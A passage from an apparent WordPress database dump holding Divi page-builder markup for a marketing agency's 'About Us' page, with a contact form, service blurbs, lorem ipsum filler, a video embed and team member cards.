_builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 18:15:44','2020-08-07 18:15:44','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(524,1,'2020-08-07 18:22:12','2020-08-07 18:22:12','WhatThehell about us','whatthehell about us','','inherit','open','closed','','whywe','','','2021-03-18 06:29:33','2021-03-18 06:29:33','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg',0,'attachment','image/jpeg',0),(525,1,'2020-08-07 18:25:26','2020-08-07 18:25:26','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\" alt=\"about WhatTheHell?\" title_text=\"whatthehell about us\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Building the future</h2>\r\n<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis iste natus sit voluptatem accusantium doloremque laudantium totam rem aperiam, eaque ipsa quae ab.</p>\r\n<p>Illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. <span style=\"font-size: 16px;\">Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.</span></p>\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. Fusce ipsum enim, <strong>ultrices at ante sollicitudin</strong>, faucibus hendrenunc. Nullam tempor nulla eu imperdiet interdum.</span></p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Eduard Ungureanu\" position=\"Project Manager\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-01.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" 